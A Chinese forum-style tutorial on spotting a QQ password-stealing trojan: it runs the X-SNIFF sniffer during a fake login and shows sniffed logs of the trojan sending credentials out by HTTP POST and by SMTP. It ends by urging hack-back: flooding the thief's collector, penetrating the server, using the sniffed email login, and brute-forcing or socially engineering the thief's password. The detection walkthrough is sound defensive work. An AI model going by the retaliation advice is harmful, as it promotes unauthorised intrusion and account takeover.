当发现QQ登陆窗口的密码输入口的保护锁被禁用了~
如图中红框所圈
这时你就要小心了,你的机器有90%以上的可能性中了偷QQ的木马了!
当然,现在盗QQ的程序越做越好了。破坏锁后图标弄成和正常的一样。这就让人郁闷了。
不过不要紧,让我来教你如何对付它!
首先准备好家伙
:X-SNIFF
进入X-SNIFF所在目录后
运行命令:xsniff -tcp -asc -pass -log qq.txt
===========================
小知识:
为什么要输入这命令呢?
-tcp
嗅探所有通过TCP协议传输的包
tcp嗅探模式最好配合-asc参数 以ASCII模式输出嗅探数据
这样像“阿拉”那些用ASP来收信的木马的收信地址就会被我们嗅到了!
-pass
嗅探密码
用此参数,可以嗅探到用EMAIL收信的QQ木马的相应EMAIL及帐号密码
===========================
然后打开QQ登陆窗口
随便输入一个QQ号和密码然后登陆
等出现正登陆的窗口时就可以关掉QQ了(当然,你也可以等到密码报错时关甚至使用真的QQ)
这时,不管是ASP收信还是EMAIL收信的盗QQ木马都会现出原形
例子1:
阿拉的ASP收信模式(嗅探结果)
POST /ald/tmdqq.asp HTTP/1.1
Accept: Accept: */*, /ald/tmdqq.asp, 192.168.0.6
Content-Type: application/x-www-form-urlencoded
User-Agent: MyApp
Host: http:// 192.168.0.6/ald/tmdqq.asp
Content-Length: 25
Cache-Control: no-cache
Cookie: ASPSESSIONIDCCTQCARD=GFNGKMAAILIKOIBLPJAOOFON
num=74444444&pass=netpatch
他的收信地址为:
http:// 192.168.0.6/ald/tmdqq.asp
收信参数为
num=74444444&pass=netpatch
提交模式为:
http:// 192.168.0.6/ald/tmdqq.asp?num=74444444&pass=netpatch
例子2:
阿拉的Email收信模式(嗅探结果)
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=12 TTL=128 Len=80 ---PA-
AUTH LOGIN //请求登陆邮件服务器
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=18 TTL=52 Len=80 ---PA-
334 dXNlcm5hbWU6 //服务器要求输入用户名
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=10 TTL=128 Len=80 ---PA-
dHJ5NHFx //盗贼的EMAIL的ID(base64加密)
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=18 TTL=52 Len=80 ---PA-
334 UGFzc3dvcmQ6 //服务器要求输入EMAIL登陆密码
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=10 TTL=128 Len=80 ---PA-
NzQxODUy //盗贼的EMAIL登陆密码(base64加密)
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=31 TTL=52 Len=80 ---PA-
235 Authentication successful //服务器反馈登陆成功标志
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=29 TTL=128 Len=80 ---PA-
MAIL FROM: <xxx@xxx.com> //QQ密码发信地址
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=13 TTL=52 Len=80 ---PA-
250 Mail OK //反馈设置信息
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=27 TTL=128 Len=80 ---PA-
RCPT TO: <xxx@xxx.com> //QQ密码收信地址
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=13 TTL=52 Len=80 ---PA-
250 Mail OK //反馈设置信息
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=6 TTL=128 Len=80 ---PA-
DATA
TCP 202.108.5.141->192.168.0.77 Port: 25->1049
Bytes=37 TTL=52 Len=80 ---PA-
354 End data with <CR><LF>.<CR><LF>
TCP 192.168.0.77->202.108.5.141 Port: 1049->25
Bytes=345 TTL=128 Len=80 ---PA-
From: ................<xxxx@xxx.com>
To: <xxxx@xxx.com>
Subject:77777----netpatch //QQ号码和密码
Content-Type: text/html; charset="GB2312"
L9NTdhkmuwwx113368ACGHJLNQQSUW
<br>------------------------------
<br>....:77777
<br>....:netpatch
<br>------------------------------
<br>IP....:218.104.xxx.xxx
<br>........:................
这时,我们可以有2种方法对付这种偷QQ的
1。用我写的 啊拉ASP收信 攻击程序,发他几万个加QQ和密码过去让他试个爽
2。渗透那服务器。
对于EMAIL接收的,如果对方只用一个EMAIL,那就简单了,拿到密码和ID,你说能做什么呢?如果对方用两个EMAIL,就看你的运气啦,看看密码是否相同或相近?用社会工程学或爆破其密码!
再不行,还是一样,发一堆假的过去。或者再想别的办法。
其他的盗Q程序基本相同。我就不多说了。
=========================
有什么错误,请批评指正!
您当前的位置:
《Windows木马清道夫》是一款专门查杀并可辅助查杀木马的专业级反木马信息安全产品,是全新一代的木马克星!《Windows木马清道夫》可自动查杀数十万种木马,拥有海量木马病毒库,配合手动分析可近100%对未知木马进行查杀!它不仅可以查木马,还可以分析出后门程序,黑客程序等等。它专业的分析功能,完美的升级功能,使您不再惧怕木马,让您远离木马的困扰
卡巴斯基单机版(Kaspersky Anti-Virus Personal)是俄罗斯著名数据安全厂商Kaspersky Labs专为我国个人用户度身定制的反病毒产品。这款产品功能包括:病毒扫描、驻留后台的病毒防护程序、脚本病毒拦截器以及邮件检测程序,时刻监控一切病毒可能入侵的途径。产品采用第二代启发式代码分析技术、iChecker实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术